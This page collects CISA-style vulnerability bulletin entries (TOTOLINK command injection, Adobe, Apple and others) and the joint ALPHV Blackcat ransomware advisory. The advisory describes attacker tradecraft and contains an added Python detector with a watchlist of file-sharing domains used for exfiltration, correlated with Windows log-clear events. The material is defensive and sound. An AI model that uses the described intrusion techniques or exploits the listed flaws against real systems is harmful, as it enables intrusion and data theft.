totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘tz’ parameter of the setNtpCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51024
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51025
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51026
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliAuthMode’ parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51027
cve@mitre.org
totolink — ex1800t TOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51028
cve@mitre.org
weintek — cmt2078x_easyweb An authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter. 2023-12-19 not yet calculated CVE-2023-50466
cve@mitre.org
windows — multiple_products An issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file. 2023-12-19 not yet calculated CVE-2023-47267
cve@mitre.org
xpand_it — write-back_manager Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack. 2023-12-20 not yet calculated CVE-2023-27172
cve@mitre.org


#StopRansomware: ALPHV Blackcat

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as Dec. 6, 2023.

This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022. Since previous reporting, ALPHV Blackcat actors released a new version of the malware, and the FBI identified over 1000 victims worldwide targeted via ransomware and/or data extortion.

FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ALPHV Blackcat ransomware and data extortion incidents.

In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMWare instances. ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations. According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities (nearly 75 percent of which are in the United States and approximately 250 outside the United States), demanded over $500 million, and received nearly $300 million in ransom payments.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

ALPHV Blackcat affiliates use advanced social engineering techniques and open source research on a company to gain initial access. Actors pose as company IT and/or helpdesk staff and use phone calls or SMS messages [T1598] to obtain credentials from employees to access the target network [T1586]. ALPHV Blackcat affiliates use uniform resource locators (URLs) to live-chat with victims to convey demands and initiate processes to restore the victims’ encrypted files.

After gaining access to a victim network, ALPHV Blackcat affiliates deploy remote access software such as AnyDesk, Mega sync, and Splashtop in preparation for data exfiltration. After gaining access to networks, ALPHV Blackcat affiliates use legitimate remote access and tunneling tools, such as Plink and Ngrok [S0508]. ALPHV Blackcat affiliates claim to use Brute Ratel C4 [S1063] and Cobalt Strike [S1054] as beacons to command and control servers. ALPHV Blackcat affiliates use the open source adversary-in-the-middle attack [T1557] framework Evilginx2, which allows them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. The actors also obtain passwords from the domain controller, local network, and deleted backup servers to move laterally throughout the network [T1555].

To evade detection, affiliates employ allowlisted applications such as Metasploit. Once installed on the domain controller, the logs are cleared on the exchange server. Then Mega.nz or Dropbox are used to move, exfiltrate, and/or download victim data. The ransomware is then deployed, and the ransom note is embedded as a file.txt. According to public reporting, affiliates have additionally used POORTRY and STONESTOP to terminate security processes.

Some ALPHV Blackcat affiliates exfiltrate data after gaining access and extort victims without deploying ransomware. After exfiltrating and/or encrypting data, ALPHV Blackcat affiliates communicate with victims via TOR [S0183], Tox, email, or encrypted applications. The threat actors then delete victim data from the victim’s system.

ALPHV Blackcat affiliates offer to provide unsolicited cyber remediation advice as an incentive for payment, offering to provide victims with “vulnerability reports” and “security recommendations” detailing how they penetrated the system and how to prevent future re-victimization upon receipt of ransom payment.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 through Table 3 for all referenced threat actor tactics and techniques in this advisory.

Table 1: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Reconnaissance

Technique Title | ID | Use
Phishing for Information | T1598 | ALPHV Blackcat affiliates pose as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees to access the target network.

Table 2: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Resource Development

Technique Title | ID | Use
Compromise Accounts | T1586 | ALPHV Blackcat affiliates use compromised accounts to gain access to victims’ networks.

Table 3: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Credential Access

Technique Title | ID | Use
Obtain Credentials from Passwords Stores | T1555 | ALPHV Blackcat affiliates obtain passwords from local networks, deleted servers, and domain controllers.
Adversary-in-the-Middle | T1557 | ALPHV Blackcat/ALPHV affiliates use the open-source framework Evilginx2 to obtain MFA credentials, login credentials, and session cookies for targeted networks.

INCIDENT RESPONSE

If compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  5. Report the compromise or phishing incident to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722).
  6. To report spoofing or phishing attempts (or to report that you’ve been a victim), file a complaint with the FBI’s Internet Crime Complaint Center (IC3), or contact your local FBI Field Office to report an incident.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices, limiting the impact of ransomware techniques and thus strengthening the security posture for their customers.

For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.

FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on threat actor activity and to reduce the risk of compromise by ALPHV Blackcat threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Applying recommendations in CISA’s joint Guide to Securing Remote Access Software.
  • Implementing FIDO/WebAuthn authentication or Public Key Infrastructure (PKI)-based MFA [CPG 2.H]. These MFA implementations are resistant to phishing and not susceptible to push bombing or SIM swap attacks, which are techniques known to be used by ALPHV Blackcat affiliates. See CISA’s Fact Sheet Implementing Phishing-Resistant MFA for more information.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Implement user training on social engineering and phishing attacks [CPG 2.I]. Regularly educate users on identifying suspicious emails and links, not interacting with those suspicious items, and the importance of reporting instances of opening suspicious emails, links, attachments, or other potential lures.
  • Implement internal mail and messaging monitoring. Monitoring internal mail and messaging traffic to identify suspicious activity is essential as users may be phished from outside the targeted network or without the knowledge of the organizational security team. Establish a baseline of normal network traffic and scrutinize any deviations.
  • Implement free security tools to prevent cyber threat actors from redirecting users to malicious websites to steal their credentials. For more information, see CISA’s Free Cybersecurity Services and Tools webpage.
  • Install and maintain antivirus software. Antivirus software recognizes malware and protects your computer against it. Installing antivirus software from a reputable vendor is an important step in preventing and detecting infections. Always visit vendor sites directly rather than clicking on advertisements or email links. Because attackers are continually creating new viruses and other forms of malicious code, it is important to keep your antivirus software up to date.
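
The network-monitoring and traffic-baseline mitigations above can be combined with two behaviors this advisory describes: logs being cleared, then data moving to Mega.nz or Dropbox. The Python below is an added example, not part of the FBI/CISA advisory; the log formats, host names, thresholds and exact watchlist domains are assumptions, and the sample log lines are constructed.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

# Assumed watchlist: the advisory names Mega.nz and Dropbox; the exact domains are our choice.
WATCHLIST = ("mega.nz", "mega.co.nz", "dropbox.com", "dropboxapi.com")
# Windows event IDs written when a log is cleared: 1102 (Security), 104 (System).
LOG_CLEAR_IDS = {1102, 104}

# Constructed sample data (hypothetical hosts and values, not from the advisory).
PROXY_LOG = """ts,host,dest,bytes_out
2024-01-08T10:02:00,WS-014,www.dropbox.com,120000
2024-01-09T11:15:00,WS-014,www.dropbox.com,95000
2024-01-10T09:40:00,WS-014,www.dropbox.com,140000
2024-01-11T02:10:00,WS-014,content.dropboxapi.com,900000000
2024-01-11T02:30:00,FS-02,g.api.mega.co.nz,4200000000
2024-01-11T02:31:00,FS-02,notmega.nz,5000000000
2024-01-11T08:00:00,WS-020,www.dropbox.com,80000
"""
EVENT_LOG = """ts,host,event_id
2024-01-11T01:55:00,EXCH-01,1102
2024-01-11T01:56:00,EXCH-01,104
2024-01-09T14:00:00,WS-020,4624
"""


def on_watchlist(dest):
    """Match a watchlisted domain or any subdomain, never a look-alike such as notmega.nz."""
    dest = dest.lower().rstrip(".")
    return any(dest == d or dest.endswith("." + d) for d in WATCHLIST)


def daily_uploads(proxy_csv):
    """Return {host: {date: [bytes, first_ts, last_ts]}} for watchlisted destinations only."""
    days = defaultdict(dict)
    for row in csv.DictReader(io.StringIO(proxy_csv)):
        if not on_watchlist(row["dest"]):
            continue
        ts = datetime.fromisoformat(row["ts"])
        slot = days[row["host"]].setdefault(ts.date(), [0, ts, ts])
        slot[0] += int(row["bytes_out"])
        slot[1], slot[2] = min(slot[1], ts), max(slot[2], ts)
    return days


def egress_alerts(proxy_csv, min_bytes=50_000_000, factor=10):
    """Flag host-days whose upload volume is large and far above that host's own history."""
    alerts = []
    for host, per_day in daily_uploads(proxy_csv).items():
        history = []
        for day in sorted(per_day):
            total, first, last = per_day[day]
            # A host with no history has a baseline of 0, so a first large upload is flagged.
            baseline = median(history) if history else 0
            if total >= min_bytes and total > factor * baseline:
                alerts.append({"host": host, "day": day, "bytes": total,
                               "baseline": baseline, "first": first, "last": last})
            else:
                history.append(total)  # only unflagged days feed the baseline
    return alerts


def log_clears(event_csv):
    """Return (timestamp, host, event_id) for every log-cleared event."""
    clears = []
    for row in csv.DictReader(io.StringIO(event_csv)):
        if int(row["event_id"]) in LOG_CLEAR_IDS:
            clears.append((datetime.fromisoformat(row["ts"]), row["host"],
                           int(row["event_id"])))
    return clears


def correlate(alerts, clears, window=timedelta(hours=6)):
    """Raise severity when any host cleared its logs shortly before or during the upload."""
    results = []
    for a in alerts:
        nearby = sorted({host for ts, host, _ in clears
                         if a["first"] - window <= ts <= a["last"]})
        results.append({**a, "severity": "high" if nearby else "medium",
                        "log_cleared_on": nearby})
    return results


if __name__ == "__main__":
    for r in correlate(egress_alerts(PROXY_LOG), log_clears(EVENT_LOG)):
        print(r["severity"], r["host"], r["day"], r["bytes"],
              "baseline", r["baseline"], "logs cleared on", r["log_cleared_on"])
```

The log-clear correlation is deliberately environment-wide rather than per host, because the cleared logs and the uploading host need not be the same machine.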

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 1-3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

VERSION HISTORY

December 19, 2023: Initial version.


Vulnerability Summary for the Week of December 11, 2023

 High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
acronis — cyber_protect_home_office Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40901. 2023-12-12 7.8 CVE-2023-48677
security@acronis.com
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48632
psirt@adobe.com
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48633
psirt@adobe.com
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48634
psirt@adobe.com
adobe — illustrator Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-47063
psirt@adobe.com
adobe — illustrator Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-47074
psirt@adobe.com
adobe — illustrator Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-47075
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48639
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48625
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48626
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48627
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48628
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48629
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48630
psirt@adobe.com
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response. This issue may lead to Information Disclosure. As of time of publication, no patches are available. 2023-12-13 8.1 CVE-2023-47619
security-advisories@github.com
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, any user (regardless of their permissions) may be able to read files from the local file system due to a path traversal in the `/hls` endpoint. This issue may lead to Information Disclosure. As of time of publication, no patches are available. 2023-12-13 7.5 CVE-2023-47624
security-advisories@github.com
afichet — openexr_viewer OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1. 2023-12-11 9.8 CVE-2023-50245
security-advisories@github.com
amttgroup — hibos A vulnerability, which was classified as critical, has been found in AMTT HiBOS 1.0. Affected by this issue is some unknown functionality. The manipulation of the argument Type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247340. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-10 9.8 CVE-2023-6647
cna@vuldb.com
antonymale — synctrayzor SyncTrayzor 1.1.29 enables CEF (Chromium Embedded Framework) remote debugging, allowing a local attacker to control the application. 2023-12-09 7.8 CVE-2021-46899
cve@mitre.org
apereo — opencast An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. It sends system digest credentials during authentication attempts to arbitrary external services in some situations. 2023-12-12 7.5 CVE-2018-16153
cve@mitre.org
apple — ipados The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing maliciously crafted input may lead to arbitrary code execution in user-installed apps. 2023-12-12 7.8 CVE-2023-40446
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 8.8 CVE-2023-42910
product-security@apple.com
apple — macos The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing an image may lead to arbitrary code execution. 2023-12-12 7.8 CVE-2023-42882
product-security@apple.com
apple — macos An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. A user may be able to cause unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42886
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42901
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42902
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42903
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42904
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42905
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42906
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42907
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42908
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42909
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42911
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42912
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42926
product-security@apple.com
apple — multiple_products The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing web content may lead to arbitrary code execution. 2023-12-12 8.8 CVE-2023-42890
product-security@apple.com
apple — multiple_products The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. Processing an image may lead to arbitrary code execution. 2023-12-12 7.8 CVE-2023-42899
product-security@apple.com
archerirm — archer Archer Platform 6.x before 6.14 P1 HF2 (6.14.0.1.2) contains an insecure direct object reference vulnerability. An authenticated malicious user in a multi-instance installation could potentially exploit this vulnerability by manipulating application resource references in user requests to bypass authorization checks, in order to gain execute access to AWF application resources. 2023-12-12 8.8 CVE-2023-48641
cve@mitre.org
armorx_global_technology_corporation — armorx_spam ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48384
twcert@cert.org.tw
asterisk — asterisk Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as certified-asterisk 18.9-cert5 and prior, the ‘update’ functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the ‘update’ functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. 2023-12-14 7.5 CVE-2023-37457
security-advisories@github.com
asterisk — asterisk Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, and 18.9-cert6. 2023-12-14 7.5 CVE-2023-49786
security-advisories@github.com
beyondtrust — privilege_management_for_mac An issue was discovered in BeyondTrust Privilege Management for Mac before 5.7. An authenticated, unprivileged user can elevate privileges by running a malicious script (that executes as root from a temporary directory) during install time. (This applies to macOS before 10.15.5, or Security Update 2020-003 on Mojave and High Sierra. Later versions of macOS are not vulnerable.) 2023-12-11 8.8 CVE-2021-3187
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. An attacker can spawn a process with multiple users as part of the security token (prior to Avecto elevation). When Avecto elevates the process, it removes the user who is launching the process, but not the second user. Therefore this second user still retains access and can give permission to the process back to the first user. 2023-12-11 8.8 CVE-2020-12613
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When specifying a program to elevate, it can typically be found within the Program Files (x86) folder and therefore uses the %ProgramFiles(x86)% environment variable. However, when this same policy gets pushed to a 32bit machine, this environment variable does not exist. Therefore, since the standard user can create a user level environment variable, they can repoint this variable to any folder the user has full control of. Then, the folder structure can be created in such a way that a rule matches and arbitrary code runs elevated. 2023-12-12 7.8 CVE-2020-12612
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. If the publisher criteria is selected, it defines the name of a publisher that must be present in the certificate (and also requires that the certificate is valid). If an Add Admin token is protected by this criteria, it can be leveraged by a malicious actor to achieve Elevation of Privileges from standard user to administrator. 2023-12-12 7.8 CVE-2020-12614
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When adding the Add Admin token to a process, and specifying that it runs at medium integrity with the user owning the process, this security token can be stolen and applied to arbitrary processes. 2023-12-12 7.8 CVE-2020-12615
cve@mitre.org
beyondtrust — privilege_management_for_windows In BeyondTrust Privilege Management for Windows (aka PMfW) through 5.7, a SYSTEM installation causes Cryptbase.dll to be loaded from the user-writable location %WINDIR%Temp. 2023-12-12 7.8 CVE-2020-28369
cve@mitre.org
campcodes — student_clearance_system A vulnerability, which was classified as critical, has been found in Campcodes Web-Based Student Clearance System 1.0. This issue affects some unknown processing of the file /libsystem/login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247367. 2023-12-11 7.5 CVE-2023-6659
cna@vuldb.com
checkmk_gmbh — checkmk Usage of user controlled LD_LIBRARY_PATH in agent in Checkmk 2.2.0p10 up to 2.2.0p16 allows malicious Checkmk site user to escalate rights via injection of malicious libraries 2023-12-13 8.8 CVE-2023-31210
security@checkmk.com
code-projects — matrimonial_site A vulnerability was found in code-projects Matrimonial Site 1.0. It has been classified as critical. Affected is an unknown function of the file /auth/auth.php?user=1. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247344. 2023-12-10 9.8 CVE-2023-6651
cna@vuldb.com
code-projects — matrimonial_site A vulnerability was found in code-projects Matrimonial Site 1.0. It has been declared as critical. Affected by this vulnerability is the function register of the file /register.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247345 was assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6652
cna@vuldb.com
collaboraoffice — richdocumentscode Collabora Online is a collaborative online office suite based on LibreOffice technology. Unlike a standalone dedicated Collabora Online server, the Built-in CODE Server (richdocumentscode) is run without chroot sandboxing. Vulnerable versions of the richdocumentscode app can be susceptible to attack via modified client->server commands to overwrite files outside the sub directory the server has provided for the transient session. Files which can be accessed are limited to those that the server process has access to. The bug was fixed in Collabora Online – Built-in CODE Server (richdocumentscode) release 23.5.602. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-12-08 7.2 CVE-2023-49788
security-advisories@github.com
